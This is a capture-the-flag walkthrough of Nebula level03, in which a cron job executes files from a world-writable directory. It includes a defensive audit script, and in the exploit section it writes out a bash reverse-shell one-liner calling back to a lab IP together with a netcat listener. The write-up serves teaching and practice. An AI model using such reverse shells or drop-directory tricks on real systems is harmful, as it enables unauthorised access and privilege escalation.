Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:




As we read the About section, we see that we need to check the home directory of 'flag03' and take note of the files there. Additionally, there is a crontab that runs every couple of minutes.

With our task in hand, we SSH into the node and move to the /home/flag03 directory:

level03@nebula:~$ cd /home/flag03/
level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     120 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ 

Two things stand out: a world-writable directory, "writable.d", and a script (writable.sh) that is owned by flag03.

We cat the script to see what it does:

level03@nebula:/home/flag03$ cat writable.sh 
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
 (ulimit -t 5; bash -x "$i")
 rm -f "$i"
done

level03@nebula:/home/flag03$ 

This is a very basic script. A for loop iterates over everything in the /home/flag03/writable.d directory. For each file it opens a subshell and runs "ulimit", which will "get or set user limits"; the -t flag sets a maximum CPU time, here 5 seconds. In that same subshell it then invokes bash -x to execute the file from writable.d, and once the subshell returns it removes the file.

My assumption here is that the crontab is calling the writable.sh script every couple of minutes. A cron job runs as the user who owns the crontab, so whoever owns it is the user any file dropped into writable.d will execute as. However, from level03 we are unable to read that crontab to confirm this.
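As an added example (not from the original write-up or the Nebula VM), a shell check for the pattern just described: it audits a directory that a cron job executes files from, reporting world-writable permissions, symlinks, and files not owned by the user the job runs as. It assumes GNU coreutils for stat -c; the directory and user name are whatever you pass in.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit a "drop directory" that a
# cron job iterates over and executes, the pattern writable.sh uses with writable.d.
# It reports the conditions that made level03 exploitable: a directory anyone can
# write to, and files in it owned by someone other than the user the job runs as.
# Assumes GNU coreutils (stat -c). Exit status: 0 = clean, 1 = findings, 2 = error.

audit_drop_dir() {
    dir="$1"      # directory whose contents the cron job executes
    owner="$2"    # user the cron job runs as (flag03 in the exercise)
    findings=0

    # Directory mode: a world-writable directory lets any local user drop a file.
    # The sticky bit (1777, as on /tmp) only prevents deleting others' files; it
    # does not stop someone adding a new one, so it is still reported.
    mode=$(stat -c '%a' "$dir" 2>/dev/null) || { echo "cannot stat $dir" >&2; return 2; }
    case "$mode" in
        *[2367]) echo "WORLD-WRITABLE directory: $dir (mode $mode)"; findings=1 ;;
    esac

    # Each entry: report symlinks (they can point "bash -x $i" at a file outside
    # the directory) and regular files not owned by the user the job runs as.
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # empty directory: glob stays literal
        if [ -L "$f" ]; then
            echo "SYMLINK: $f -> $(readlink "$f")"; findings=1
            continue
        fi
        fowner=$(stat -c '%U' "$f")
        if [ "$fowner" != "$owner" ]; then
            echo "FOREIGN FILE: $f owned by $fowner, job runs as $owner"; findings=1
        fi
    done
    return "$findings"
}

# Usage: sh audit_drop_dir.sh DIR JOB_USER   (e.g. /home/flag03/writable.d flag03)
if [ "$#" -eq 2 ]; then
    audit_drop_dir "$1" "$2" && echo "clean: $1"
fi
```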

So, what I do is create a file containing a reverse shell and place it in the writable.d directory:

level03@nebula:/home/flag03$ echo "bash -i >& /dev/tcp/192.168.56.1/4444 0>&1" >  /home/level03/shell
level03@nebula:/home/flag03$ cp /home/level03/shell writable.d/
level03@nebula:/home/flag03$ ls -lah writable.d/
total 4.0K
drwxrwxrwx 1 flag03  flag03  60 2017-02-25 14:07 .
drwxr-x--- 1 flag03  level03 60 2011-11-20 20:39 ..
-rw-rw-r-- 1 level03 level03 43 2017-02-25 14:07 shell
level03@nebula:/home/flag03$ 

At this time, I also set up my listener on the same port:

eric@geoda:~$ nc -nlvp 4444
listening on [any] 4444 ...

I then wait:


eric@geoda:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.106] 55958
bash: no job control in this shell
flag03@nebula:~$ whoami
whoami
flag03
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$ 

As hoped, the shell connects back and I am running as flag03! I run getflag to confirm.

This exercise shows how crontabs can be exploited. It also shows that a world-writable directory whose contents are executed by a higher-privileged user's job can be exploited too: anyone who can write to it gets code run as that user.

Thanks for reading!

-geoda